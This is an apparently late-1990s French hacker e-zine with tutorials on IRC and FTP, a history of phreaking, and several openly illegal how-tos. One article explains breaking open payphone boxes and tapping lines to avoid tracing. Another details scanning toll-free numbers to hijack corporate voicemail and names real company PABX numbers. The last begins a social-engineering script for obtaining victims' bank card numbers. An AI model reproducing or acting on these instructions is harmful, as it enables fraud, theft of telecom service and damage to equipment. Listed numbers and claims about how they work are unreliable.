// l'inverse vous rentrez la commandes -o, celui-ci perdra tous ses
// privilege et deviendra un utilisateur de base. Il faut etre soi-meme op
// pour utiliser cette commande.
La commande v
// Si vous rentrez la commande +v alors l'utilisateur
// deviendra voicé (il aura le droit a la parole) sur la channel defini.
// Cette commande n'est utile que si la channel n'autorise pas les
// utilisateur de base a parler. Si a l'inverse vous rentrez la commandes -v,
// celui-ci perdra son voice et deviendra un utilisateur de base. Il
// faut etre soi-meme op pour utiliser cette commande.
La commande i
// Celle-ci invite l'utilisateur a se joindre a une channel.
// Ex: la channel est invisible, on invite l'utilisateur, l'acces est
// restreint pour les autres.
Les commandes qui s'appliquent a une channel:
La commande l
// La commande l +nombre limite la channel a nombre
// utilisateur. Pour suppimer cette restriction -l .Il faut etre op pour
// utiliser cette commande.
La commande t
// Seul l(s)'operatuer peut changer le titre duc canal +t et
// pour supprimer cette interdiction -t .
La commande m
// Seul les operateurs et les voicÈ (+v) peuvent parler sur
// la channel avec +m , pour supprimer cette interdiction, -m .
III) Les differents serveurs IRC:
Il existe plusieurs type de serveurs (beaucoup) mais je vais vous en donner une liste des principaux:
Cette liste ne concernera uniquement les serveurs Undernet et IrcNet.
La connection se fait pour toute au port 6667.
Undernet Caen.Fr.Eu.UnderNet.org
Undernet Paris.Fr.Eu.UnderNet.org
Undernet toronto.on.ca.undernet.org
Undernet montreal.qu.ca.undernet.org
Undernet channels.undernet.org
Undernet Antwerpen.Be.Eu.Undernet.org
Undernet Goettingen.DE.EU.undernet.org
Undernet Regensburg.DE.EU.undernet.org
Undernet Sevilla.ES.EU.UnderNet.org
Undernet Diemen.NL.EU.undernet.org
Undernet Leiden.nl.eu.undernet.org
Undernet Oslo-R.NO.EU.Undernet.org
Undernet Oslo1.NO.EU.Undernet.org
Undernet lulea-r.se.eu.undernet.org
Undernet London.UK.eu.Undernet.org
Undernet auckland.nz.undernet.org
Undernet protocol.undernet.org
Undernet phoenix.az.us.undernet.org
IRCNet sil.polytechnique.fr
IRCNet irc.wu-wien.ac.at
IRCNet flute.telstra.net.au
IRCNet ircd.belnet.be
IRCNet irc.openface.ca
IRCNet irc.span.ch
IRCNet irc.aimnet.com
IRCNet irc.anet-chi.com
IRCNet ircnet.irc.aol.com
IRCNet chat.btinternet.com
IRCNet irc.insat.com
IRCNet ircnet.sprynet.com
IRCNet irc.u-net.com
IRCNet irc.felk.cvut.cz
IRCNet irc.gmd.de
IRCNet sunsite.auc.dk
IRCNet irc.dknet.dk
IRCNet irc.ut.ee
Conclusion:
J'espere que cette articles vous aura aider a comprendre un partie du
protocole irc et de savoir la maniere don interprete votre logiciel irc
lorsque vous cliquez sur un bouton. Il est certain que je n'ai pas decrite
toute les commandes Irc, c'est un travail trop long et sans interet, si
vous desirez reelement en apprendre plus alors lisez le RFC 1459 (qui
date de 1993) et ses ameliorations dans les RFC 2810, 2811, 2812, 2813,
ou encore des articles specialisÈs... Si vous souhaitez m'envoyer vos
commentaires sur cette article, vous pouvez le faire par mon mail: sKoop@programmer.net
Bon chat
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
////////////////////////////////////////////
// 9 //////////////////////////////////////
///////////Telnet: FTP (Le NB how-to)/////
/////////////////////////////////////////
/////////////////////////////par sKoop//
Intro:
Apres avoir déjà écrit un article sur l'irc, je me suis demandé pourquoi ne pas
aussi en écrire un sur le ftp, lorsque l'on se connecte a internet, c'est aussi
pour télcharger de nouveaux logiciels ou autres informations, un protocole très
bien implementé dans le transfert de fichier est le FTP (File Transfer Protocole).
Pourquoi par telnet? et bien une fois de plus pour mieux comprendre ce qu'est le
protocole, et pour pouvoir faire du Ftp par n'importe quelle machine.
I) Compte et Mot de Passe:
Il y a 2 types de comptes, le compte anonymous qui ne nécessite comme mot de passe
que votre adresse e-mail, et les comptes comportant un nom/mot_de_passe. Nous
étudierons ici les connexions avec un compte anonymous cela dit la méthode ne
change pas, seul les droits sur le serveur par la suite changent.
II) Connexion a un serveur FTP:
Il va donc falloir ouvrir une session telnet.Dans le cas present, je dispose
d'un compte anonymous et mon mot de passe est mrspok@test.com. Le serveur est
987.654.321.0 et le port me permettant d'accéder au serveur est le port 21
(Le port varie selon le choix de l'administrateur ftp mais cela reste généralement
le port 21). Le signe > désigne que la commande doit être rentrée par vous et <
qu'elle est envoyée par le serveur. Pour cela rentrer la commande:
// telnet ip_du_serveur port_du_serveur donc dans notre cas, cela donne:
> telnet 987.654.321.0 21
// Si tout fonctionne correctement, le serveur vous renvoie des informations
// à son sujet (peut-etre de plusieurs lignes)
< 220 Bienvenue ...
< 220 ... ...
//A vous de rentrer un nom d'utilisateur (le notre est donc anonymous):
> User anonymous
// Dans le cadre d'un nom/mot_de_passe, meme si le nom est faux il
// demandera quand meme le mot_de_passe et renverra "Mauvais mot de passe".
// cela pour tromper les ptit lamers qui croient avoir trouvé un n_
// de compte valide ;) Le serveur renvoi alors la demande du mot de passe
// de l'utilisateur concernÈ:
< 331 Envoyer votre email comme mot de passe.
> PASS mrspok@test.com
// Pour les comptes anonymous, l'opération devrait à coup sur avoir
// reussie. Le serveur peut alors vous renvoyer d'autres informations sur le
// serveur FTP par le biais du n_ 230:
< 230 L'heure locale est ... Il y a 14 connectés dans votre classe ...
< 230 ... ...
// il vous renvoi generalement le repertoire dans lequel vous vous trouvez
// par 257
< 257 Le repertoire courant est "/"
Voila, vous etes connectez au serveur.
III) Liste des commaneds FTP:
ACCOUNT (ACCT) // Parfois certains serveurs necessitent de specifier un login specifié à un compte.
CHANGE WORKING DIRECTORY (CWD) // Permet de changer le répertoire courant.
REINITIALIZE (REIN) // Cela permet de stopper une session d'un utilisateur afin de pouvoir se reloggé sous un autre nom.
LOGOUT (QUIT) // Termine la session.
!!! Note !!! Tous les parametre de transfert Ftp ont des valeurs par defaut, utiliser les commandes ci-dessous modifiera ces valeurs.
LIST (LIST) // Renvoi la liste du repertoire courant
TRANSFER MODE (MODE) // MODE est le mode de transfert (par defaut flux) peut-etre changer (B Bloc, C Compressé, S Flux)
RETRIEVE (RETR) // transmet une copie d'un fichier selectionné vers USER-DTP (moi) Il faut specifier le type.
RENAME FROM (RNFR) // Cela montre l'adresse d'un fichier qui doit etre renommé sur le serveur puis utiliser la commande suivante.
RENAME TO (RNTO) // indique le nouveau nom souhaité
ABORT (ABOR) // cela stop la derniere commande FTP effectué. (Ne permet pas de revenir
en arrierre sur une action passée, l'action doit etre en cours)
DELETE (DELE) // Supprime le fichier specifié.
REMOVE DIRECTORY (RMD) // Supprime un repertoire
MAKE DIRECTORY (MKD) // Creer un repertoire
PRINT WORKING DIRECTORY (PWD) // Imprime un repertoire
PASSIVE (PASV) // Cette commande renvoi au serveur de ne faire que un (listen) sur des ports données.
HELP (HELP) // demande de l'aide sur un sujet particulier au serveur
Exemple d'un transfert de fichier:
> RETRIEVE ASCII (chemin du serveur) // on prends ici un fichier de type ASCII
> STOR ASCII (chemin du DD locale) // on le ramene a la maison.
Conclusion:
J'apprends le protocole FTP depuis peu donc si certaines informations vous semblent
incorrect veuillez m'en faire part. Ne vous basÈ pas sur mon article si vous désirez
réellement apprendre le protocole FTP. Recherchez le sur Internet: RFC 959
Si vous avez des suggestions/commentaires, veuillez m'envoyer un mail a:
sKoop@programmer.net
Bon transfert...
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
*********************************************************************
* 10 *
* Le FTP et le TFTP *
* *
* par N0s-k *
* *
*********************************************************************
1. Le FTP
---------
A. Définition
-------------
FTP est à la fois un protocole et un utilitaire TCP/IP permettant de transférer des fichiers
(binaires ou texte) entre la machine local et un ordinateur distant (qui doit bine sur disposer
d'un serveur FTP ;)
Il peut fonctionner selon deux modes :
- Interactif
- Ligne de commande
B. Mode Interactif.
------------------
En mode interactif, l'utilisateur établit la connexion puis frappe les commandes lui-meme au fur
et a mesure des besoins ;)
Cette commande lance FTP et lui indique à quelle machine du réseau il doit effectuer la requete :
ftp [options] host
-d Affiche les infos de deboggage
-v Supresion du mode 'bavard' (verbose)
-g interdit l'usage de caractère génèrique lors de
transferts de multiple fichier
-i utilisation non interactive: pas de prompt
Host représente la machine distante, soit son IP soit son equivalent
=>www.microsoft.com par exemple ;)
Ensuite il suffit de taper les commandes ;)
-------------------------------------------------------------------------
! cmd_shell Execution d'une commande shell locale.
-------------------------------------------------------------------------
Ascii Transfert en Ascii
-------------------------------------------------------------------------
bell Bip Sonore en fin de chaque transfert reussi
-------------------------------------------------------------------------
binary Transfert de fichier binaire
-------------------------------------------------------------------------
bye Fin de session FTP, retour au schell
-------------------------------------------------------------------------
cd Changement de repertoire sur la machine distante
-------------------------------------------------------------------------
close Termine la connextion avec le serveur FTP sans fermer
FTP
-------------------------------------------------------------------------
debug Mise en marche du debugger
-------------------------------------------------------------------------
delete Effacement de fichier sur la machine distante
-------------------------------------------------------------------------
dir chemin Affichage du catalogue sur la machine distante
-------------------------------------------------------------------------
get nom_fichier Copie d'un fichier distant sur la machine locale
-------------------------------------------------------------------------
help Accès a l'aide de FTP
-------------------------------------------------------------------------
lcd local_Dir Changement de repertoire sur la machine locale
-------------------------------------------------------------------------
ls Affichage du catalogue de la machine distante
-------------------------------------------------------------------------
mdelete files Suppressions de plusieurs fichiers
-------------------------------------------------------------------------
mdir Pareil que dir, sauf qu'on peut mettre plusieurs Rep
en meme temps
-------------------------------------------------------------------------
mget Transfert de multiple fichiers
-------------------------------------------------------------------------
mkdir Creation de repertoire sur la machine distante
-------------------------------------------------------------------------
mls Comme ls mais on peut mettre plusieurs noms de
fichier ;)
-------------------------------------------------------------------------
open Ouverture d'une session FTP
-------------------------------------------------------------------------
put Copie d'un fichier de la machine locale vers la
machine distante
-------------------------------------------------------------------------
pwd Affichage du rep courant sur la machine distante
-------------------------------------------------------------------------
quit Fin de session FTP, retour au schell
-------------------------------------------------------------------------
quote Transmet des commandes a la machine distante sans
l'interpreteur local
-------------------------------------------------------------------------
remotehelp Demande d'aide pour connaitre les commandes supportés
par l'hote distant
-------------------------------------------------------------------------
rmdir.dir_name Surppime un repertoire sur la machine distante
-------------------------------------------------------------------------
send Synonyme de put
-------------------------------------------------------------------------
status Affiche l'etat de courant de FTP
-------------------------------------------------------------------------
user username Permet de s'identifier par rapport au serveur FTP de
la machine distante, un mot de passe est quasiment
tout le temps exigé ;))
-------------------------------------------------------------------------
Valà c'est a peu près tout au nivo de ce mode, qui est le plus utilisé :)
C. Mode Batch
-------------
En mode batch, l'ensemble des paramètres sera fournit à FTP sur la ligne de commande de
l'interpreteur et via un script a executer
La commande sera alors lancé de la manière suivante :
ftp -n -s:scriptftp
ou scriptftp est le nom du fichier contenant les instructions a exécuter.
Celui ci pourra ressembler a celui là :
-------------------------
open www.microsoft.com
user billou fric
cd /
cd tmp
put win.zip
close
bye
-------------------------
Ce mode est donc plein d'avantage, il permet de faire des choses habituelles sans se
faire chier a tout retaper, par exemple telecharger tout le contenu d'un repertoire mis
a jour tous les jours.... enfin il y a plein d'utilisation ;)
2. Le TFTP
----------
Version allegé de FTP, le Trivial FTP est un protocole et une commande simplifié de transfert de
fichier entre deux machine. Il s'appui sur UDP et ne procède pas a l'identification des
utilisateurs... :)
TFTP [-i] hote_ip GET | PUT fichier source [destination]
-i Transfert de fichier Binaire
Hote_Ip Machine source
get Permet de recevoir des fichiers depuis la machine
distante.
put Permet d'envoyer des fichier sur la machine
distante.
Je suppose que tout le monde a compris les avantages et inconveniant de ces deux protocoles,
malheureusement, ne comptez pas avoir /etc/passwsd en TFTP ;)
Meme si avant ct le cas :((
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
////////////////////////////////////////////
// 11 /////////////////////////////////////
/////////Cabine Ft (Le NB How-to)/////////
/////////////////////////////////////////
/////////////////////////////par sKoop//
Intro:
J'ecrit cette article pour tous ceux qui comme moi sont interessés par
ce qui se trouve derrière ces petites boites en ferrailles que l'on
peut trouver dans chaque cabine telephonique ainsi que les petites boites
en plastique situées un peu plus haut que les telephones FT dans les métros.
Je n'ai pas phreaker assez souvent pour vous donnez réellement tous les
conseils nécessaires ainsi que toutes les mises en garde (il n'y en aura
jamais assez trop) mais je vais vous montrer ce qu'en quelques descentes
on peut apprendre.
1) Outils:
Le materiel du phreaker est la plupart du temps fait maison, je vais essayer
de vous guider le mieux que possible dans la réalisation d'un petit telephone
adaptable sur toutes les lignes telephoniques.
Tout d'abord, il vous faut:
-un vieux telephone (le plus petit possible pourla discretion) avec au bout une prise ...
-un adaptateur ... vers ...
-2 pinces croco
-un fer a souder et de l' étain
-du scotch ou/et de la colle
-une clé de 11 (cela fonctionne dans la majorité des cabines FT sur Paris) ou bien mieux une
clé FT ou encore RATP (ce sont les mêmes).
Souder un des fils du milieu de l'adaptateur au fil d'une pince croco. Souder le deuxieme
fil du milieu de l'adaptateur au fil de la deuxieme pince croco. Enrouler de scotch ou/et
alors utiliser de la colle afin que les pinces croco ne se decole pas de l'adaptateur (Dans
la cabine, si le fil du telephone n'est pas très long alors sela risque de s'arracher).
Brancher l'embout de votre telephone dans l'adaptateur. Vous avez maintenant en possesion
un telephone a pince croco
2) Lieu:
D'abord, reperer un lieu ou il y n'y a pas de passant ou bien tres peu. Essayer de
voir si il n'y a pas de poste de police a proximité. Verifiez si les rondes des camions
de polices sont fréquentes. Verifier que la cabine fonctionne (bien que la cabine
pourrait etre cassée tandis que la ligne fonctionnerai).
3) Cabine FT:
D'abord, il faut ouvrir la boite en métal dans la cabine FT. A ce point plusieurs
solutions s'offrent à vous. Soit vous sortez votre clé de 11 ou votre clé FT et vous
l'ouvrez normalement. Soit vous sortez votre mini-pied de biche (faites en sorte
qu'il ne soit pas trop voyant et que vous vous trouviez dans un endroit réellement
désert, cela risque de faire du bruit.). La cabine est ouverte!!! Maintenant vous
vous trouvez face a plein de jolis petits interupteurs ainsi qu'en face d'une
vingtaines de fils de toutes les couleurs. Ne vous inquietez pas, il vous faut
prendre les fils de couleur rouge et vert ou encore blanc et vert (cependant
j'ai rencontré une cabine ou ces fils n'etaient pas comme ça, donc j'ai du chercher et
j'ai trouvé deux fils dans leurs coin 1 gris et 1 rouge). Si ce ne sont pas les
bonnes couleurs dans votre cabines alors cherchez bien, deux fils doivent se
distinguer des autres et remonter vers le telephones FT. Pour voir si ce sont les
bons fils ils va vous falloir les denudés, sortez votre petit couteau suisse et
enlever le plastique autour des fils. Faites attention ne les coupez pas !!! Ensuite
faites des tests, brancher vos deux pinces croco aux deux fils denudés et voyez si
vous avez la ligne.
4) Portable (pc):
Pour brancher votre portable et avoir acces a tous les 3614,3615 et même a
Internet, vous devez faire les mêmes branchements mais au lieu de raccorder
le telephone, raccordez votre prise modem. A vous les scans VMB/PABX sans vous
soucier que l'on trace votre numero de tel.
Conclusion:
Je pense qu'il faut etre réellement vigilant surtout quand on habite dans des
grandes villes. Le risque est beaucoup plus elevé que dans des bleds paumés
(la vous pouvez réellement sortir votre pied de biche). Merci a tab avec qui
j'ai fait mes experiences. Vous pouvez me mailez a :
skoop@programmer.net
Bon phreak.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
*********************************************************************
* 12 *
* Histoire du phreaking *
* *
* by Elgadir *
* *
*********************************************************************
Bonjour à tous, vous avez l'immense honneur de lire mon premier article
sérieux ;-) Et même si je n'ai pas eu beaucoup de temps pour le faire,
j'espère que vous l'appreciez.
Voilà pour l'intro générale, je vais maintenant passer à ce qui nous
interresse : le phreaking. Tout au long des numéros de ce mag, je vais devoir
vous en parler et j'essaierai de faire une sort de petite encyclopédie du
phreaking. Aujourd'hui, vous aurez droit à l'histoire du phreaking et aux PABX
(avec les VMB bien sur). Bon, je commence...
Avant propos : je préfère vous rappeller brièvement ce qu'est le phreaking,
c'est tout simplement le piratage du téléphone, autrement dit, le hack et
la pénétration de réseaux téléphoniques. Le mot phreaking est le diminutif de
freak, free et phone, littéralement "mordus du téléphone gratuit".
Cet article ne sera pas exhaustif, mais j'ai essayé de vous trouver
le maximum d'informations là dessus, vous êtes gatés ;)
1. Petite histoire du téléphone
Tout d'abord, je vais vous faire un bref résumé de l'histoire du
téléphone, cela vous rappellera que cette invention est très ancienne,
et on a mis quand même beaucoup de temps à se rendre compte de "l'autre"
utilisation que l'on poutvait en faire.
L'histoire commence donc en 1876 lorsque Graham Bell dépose le brevet
de sa nouvelle invention, le téléphone, Bell n'avait réussi qu'à communiquer
entre deux pièces. Il commercialisera la première liaison téléphonique entre
deux points un an plus tard et le réseau d'appel télégraphique utilisé à
l'époque aux Etats-Unis sera transformé en un réseau téléphonique.
Etant encore assez cher, le téléphone ne se démocratisera aux
Etats-Unis qu'au début de notre siècle. Et les premiers phreakers arriveront
dans les années 60, c'est à dire, avant la grande démocratisation du téléphone
en France au debut des années 70.
2. Le phreaking
Au début des années 60, en pleine révolution sociale américaine,
naissait un « mouvement technologique anti-institutions, anarchiste et
parfois "New Age", sur fond de musique, de drogue et de reliquats dune
contre-culture ». Le phreaking naît dans ce milieu dejà "underground".
On a souvent associé la naissance du phreaking à la découverte de
la blue box par John Draper, alias Cap'n Crunch. La légende dit que notre
phreaker, étant soulé par ce que lui disait un ami au téléphone, sortit un
sifflet bleu de la boîte de céréales Captain Crunch qu'il était en train de
manger et abima les oreilles de son correspondant. Il se rendit compte plus
tard que la conversation qui suivit, l'ami du phreaker n'ayant pas raccroché,
fût gratuite. La blue box était née, et le mythe 2600 aussi, car le sifflet
émétait sur la fréquence 2600 Hz. Tone qui permettait, à cette époque là, de
faire croire au centre téléphonique que l'on avait raccroché et l'on pouvait
ensuite continuer à téléphoner gratuitement.
Mais le phreaking existait dejà depuis quelques années au moment où
cette aventure a eu lieu. Et John Draper était déjà un phreaker reconnu dans
cette communauté qui commencait à se former. Le but de ces phreakers était un
peu le même que celui des hackers d'aujourd'hui, mais dans un autre domaine. Ils voulaient
connaître parfaitement le fonctionnement du système téléphonique et à en découvrir
les failles, pour leur permettre, éventuellement, d'effectuer des appels gratuits.
On consacre une autre anecdote à Draper, celle ci montre bien les techniques
et les agissements des pionniers du phreaking. Notre cher phreaker effectua un appel
interurbain à partir d'une cabine téléphonique, et grâce à ses connaissances en matière
de réseau téléphonique, réussit à appeler une cabine voisine de la sienne en faisant
transiter son appel autour du monde. Cela montre bien le désir de découverte qu'avait
les phreakers.
Pendant encore une dizaine d'années, ce type de pratiques était courant.
Durant cette période, la communauté phreaking s'organisa grâce à la formation de
groupes, la publication de mags déstinés à diffuser les nouvelles informations;
l'organisation était, Internet en moins, la même que celle des hackers aujourd'hui.
Fin 1971, un article publié dans le magazine Esquire, "Secret of the Little
Blue Box" fit connaître le piratage téléphonique au grand public. Et c'est à ce moment
que les gouvernements de plusieurs états américains décidèrent d'instaurer des lois
punissant ces pratiques. Cela fit du phreaking, un mouvement moins important et beaucoup
plus caché.
Le phreaking n'en était pas mort pour autant, il devenait illégal, c'est tout.
L'autre grande figure du hacking sera Kevin Mitnick, qui a débuté ses activités
underground par le piratage de réseaux téléphoniques. Adolescent, il aurait piraté
le service des renseignements (le 12) américain, et il en aurait changé le message
d'acceuil par : "La personne que vous recherchez est-elle blanche ou noire, monsieur?
Car nous tenons deux répertoires distincts." Ce n'est qu'une légende, mais c'est toujours
interressant. Et puis, s'il a vraiment fait cela, il faut relativiser, car, à cette
époque les systèmes de sécurité étaient quasiment inexistants.
Mitnick, alias le Condor (il a emprunté ce pseudo au film avec Robert Redford,
"Les trois jours du condor"), a tout de même était un grand phreaker. Nous sommes à
la fin des années 70 et Mitnick, agé alors de 16 ans, rentre dans un groupe de pirates
des télécoms. Ce gang se réunissait dans un resto à Los Angeles, et son but était juste
de faire de petites farces anodines grâce au téléphone, mais une effraction informatique,
moins anodine tout d'un coup, dans le relais d'une société télécom de Los Angeles fait
connaître la police au gang.
Le Condor redevient libre (de son gang) et s'offre la liberté de se balader dans
le système des télécoms américain pour déconnecter ses ennemis ou changer leur nom d'abonné
en James Bond (lol :)). Il s'est attribué aussi un bon millier de numéros de téléphone
finissant par 007 (comme quoi, chacun ses goûts !).
Le dernier exploit en tant que phreaker de Mitnick sera un bon coup de S.E.
(Social Engeenering) effectué avec deux amis. On est à la limite du phreaking, mais
c'est un central téléphonique qui sera pénétré par nos trois pirates. En effet, ils se rendent
physiquement au central téléphonique COSMOS de Pacific Bell à Los Angeles. Le Computer
System for Mainframe Operations est une base de données utilisée par les grandes sociétés
nationales pour contrôler les fichiers mémoires darchives des appels, ils servent
notamment à la facturation des consommations. Ils y trouvent une liste de mots de passe
informatiques, des combinaisons pour certains bureau du central et des guides d'utilisation
du COSMOS. Ils référencent ensuite leurs pseudos, pour pouvoir revenir plus facilement.
Mitnick n'a alors que 17 ans et se fera arrêter par la police pour cette histoire.
Il écopera de 3 mois d'hébergement dans un centre de déténtion pour la jeunesse. Les
activités de Mitnick par la suite seront plutôt considérées comme du hacking pur et
simple et non du phreaking.
Il n'y aura ensuite plus de grands faits majeurs dans l'histoire du phreaking.
Ce n'est pas pour autant qu'il n'y a plus de phreakers, mais ils se font moins connaître,
d'autant plus que les systèmes de sécurité se perfectionnent au fil du temps et que le
phreaking devient plus dur, par exemple, la blue box ne marche plus (elle n'a jamais
marché en France). Les phreakers d'aujourd'hui se consacrent essentiellement aux PABX...
Elgadir
PS : si cet article vous a intéressé, dites le moi par mail (elgadir@usa.net),
et j'essaierai de faire le même (mais en plus long) pour le hacking.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
*********************************************************************
* 13 *
* Les VMB/PABX *
* *
* by Elgadir *
* *
*********************************************************************
Vous avez surement déjà lut beaucoup d'articles là-dessus, mais
comment peut-on commencer un mag sans en parler? Avant tout je tiens à vous
prévenir que cet article ne sera pas complet, n'ayant pas le temps de trouver
toute l'info dont j'ai besoin pour faire un article très complet et actualisé,
je vous promet cela pour le prochain numéro. Mais je vais quand même parler de
cela pour ceux qui débutent.
1. Qu'est-ce qu'un PABX?
Un Private Automatic Branch eXchanger est un central téléphonique
utilisé par beaucoup de grandes entreprises qui gère les appels entrants
et sortants de cette entreprise. Le PABX permet à un employé d'appeler
l'extérieur à partir de son bureau, en appuyant sur une touche, le 0 par exemple.
Cette touche avertit le PABX que l'employé va appeler l'estérieur, notre employé
peut ensuite composer son numéro. Le PABX sert aussi à joindre un employé de
l'extérieur grâce à son numéro de poste. Enfin, ce central donne à chaque employé
une boîte vocale.
Ce qui devient interressant, c'est que, les PABX sont souvent accessibles
(mais pas toujours) de l'extérieur par un numéro vert, du moins, en dehors des
heures de bureau.
2. A quoi cela peut bien servir pour le phreaker?
Commme je vous l'ai dit, beaucoup de PABX sont accessibles par un numéro vert,
donc gratuit. Cela permet notamment aux employés d'accéder à leur boîte vocale quand
ils ne sont pas au bureau ou encore de téléphoner gratuitement quand ils sont en
déplacement, grâce à un outdial. En gros l'employé appelle le cental par un numéro
vert, compose son code secret et peut ensuite appeler gratuitement. Le but du phreaker
sera de détourner ces deux utilisation officielle du PABX à son avantage. Le phreaker
pourra donc avoir une boîte vocale accessible gratuitement, et mieux, s'il trouve un
outdial, il pourra téléphoner gratuitement. Aujourd'hui je ne vous parlerait que des
boîtes vocales (je n'ai pas beaucoup de temps...).
3. Les VMB
Vous l'avez compris les Voice Message Box sont les boîtes vocales utilisables par
les employés. Pour accéder à sa VMB, son propriétaire doit appeler le PABX (grâce au
numéro vert et en dehors des heures de bureau), ensuite il doit appuyer sur une touche
(généralement * ou #) pendant le message d'acceuil normal, pour déboucher sur le menu
de la PABX. Ensuite, il donne son numéro de VMB et son pass et il écoute ses messages.
Pour se faire une boîte vocale gratuite, il faur procéder par plusieurs étapes :
a) Trouver un PABX
C'est surement une des parties les plus chiantes, car il faut prendre son téléphone
et scanner pleins de numéros verts, là vous avez plusieurs méthodes.
La plus connue, c'est de scanner comme un malade des numéros faciles à retenir du
type 0800 ABC ABC ou 0800 AB AB AB etc. Je ne trouve pas cette méthode très pratique,
car on scanne pendant des heures sans trouver grand chose.
Une autre technique consiste à taper "numéro vert" dans la case Activité du minitel
(3611) d'indiquer une localité quelconque, de relever beaucoup de numéros verts et de les
essayer. J'ai essayer cette technique, mais je ne la vous conseille pas, parce que beaucoup
de numéros verts appartiennent à de petites PME qui n'ont pas de PABX, ce n'est pas comme
ça que vous trouverez beaucoup de PABX.
La méthode que j'ai trouvé, est encore plus simple, mais beaucoup plus efficace.
Vous prenez toujours votre minitel, vous mettez toujours "numéro vert" dans la case
Activité, mais dans la case Nom/Marque, vous mettez le nom d'une grande entreprise
(banques, voitures, informatiques, etc.), vous pouvez etre quasiment sur de trouver
beaucoup de PABX avec cette méthode car la majorité des grandes entreprises ont un PABX.
b) Savoir si le numéro scanné est un PABX
Là, c'est plus simple :
-Si c'est quelqu'un qui décroche et vous dit "Allo", c'est pas un PABX.
-Si vous tombez sur un répondeur, c'est peut etre un PABX. Dans ce cas là, votre
réflexe est d'appuyer sur les touches *, #, 0, 1, 9, 0+*. Si après avoir appuyé sur
une de ces touches, vous tombez sur le menu du PABX qui vous propose plusieurs choses,
comme acceder à sa boîte vocale ou déposer un message, vous avez gagné.
-Si on vous demande un code confidentiel, c'est un PABX. Ce cas est assez dur à exploiter,
car il faut trouver un bon mot de passe souvent assez long.
c) Utiliser le PABX et se faire une VMB
Vous êtes donc maintenant dans le menu général du PABX. Pour voir à quoi ça ressemble,
faites le 0800 010 800 et appuyez sur * pendant le message d'acceuil. Ensuite, vous avez en
général deux options : soit déposer un message, soit accéder à sa VMB pour écouter ses messages.
Maintenant, le but du jeu sera de trouver une VMB de libre pour que tous vos potes puissent
vous laisser des messages gratuitements :) Vous allez donc choisir l'option écouter ses messages.
Ensuite, la dame va vous demander le numéro de la VMB, ils sont généralement à quatre chiffres et
commencent souvent par 4. Pour trouver un numéro de poste valide, essayez d'abord le 4, si la dame
ne dit rien, cela veut dire qu'il existe des postes compris entre 4000 et 4999. Puis vous continuez,
avec 1 par exemple, si elle ne dit rien, il existe des postes compris entre 4100 et 4199, vous
continuez comme ça, et vous devriez tomber rapidement sur un numéro de poste valide.
Là, soit vous entendez le message d'un employé et vous cherchez une autre VMB, il vaut mieux
pas prendre celle d'un employé sinon, ils vont se rendrent compte qu'il ont été piraté et vont vérifier
toutes les VMB du PABX et vous avez perdu un numéro vert :( Par contre si, on vous dit que la VMB n'est
utilisée par personne, servez vous :D mettez un mot de passe, un beau message d'acceuil, et voilà, vous
avez une VMB flambant neuve prête à etre utilisée.
4. Quelques numéros de PABX
0800 010 800 + * => PABX du groupe Habitat, numéros de poste en 4XXX
0800 397 397 + * => PABX de Hilti, numéros de postes en 5XXX
0800 499 499 + * => PABX de la mutuelle Renault
0800 39 39 51 + *
0800 11 34 83 + *
0800 065 065 + * => PABX de Cofidis
0800 002 002 => demande de code confidentiel, si vous en trouver un, n'hésitez surtout pas à me prévenir :)
0800 126 126 => même remarque que ci dessus
J'espère qu'avec ça, vous pourrez vous amuser jusqu'au prochain numéro :)) Et je vous expliquerai en
détail comment se faire un outdial et téléphoner gratuitement par la même occasion :)
Conclusion :
Voilà pour mon premier article, vous vous dites peut-etre que c'est maigre, mais
je n'avais pas énormément de temps et je vous en promet beaucoup plus la
prochaine fois. En attendant, vous pouvez toujours me joindre à mon mail : elgadir@usa.net
ou sur ma VMB, elle est sur le 0800 010 800 et ma box est la 4421.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
*********************************************************************
* 14 *
* Phoner gratis *
* *
* par NOs-K *
* *
*********************************************************************
Bon cette fois-ci je vais vous exposer une méthode très intéressante au niveau des techniques
qu'elle enseigne ! Et puis avouez que le but est fort intéressant : Téléphoner GRATOS !!!
1. Ce que vous aurez besoin.
Héhé..si je vous avez dit: "vous aurez besoin d'un telephone qui est connécté chez quelqu'un
d'autre" avouez que ça aurait été déjà intéressant....donc niveau Matos, une bonne paire de
coui**e et ça suffira :p
2. Acte I : "Le SE" ou "Les gens sont vraiment con"
Bon ce n'est pas très compliqué, vous allez vous faire passé pour quemqu'un d'autre (le SE)...et
cette autre personne sera pas exemple "Un technicien informatqueuuu". Pour mieux suivre la
discussion, qui aura pour but de récupérer nom, prénom, n° de carte bleue+ date de validité, on
va vous simbolisé par un bonhomme en 1024*768 (Quoi ça rentre pas ???) bon alors:
*=Vous et $=Victime
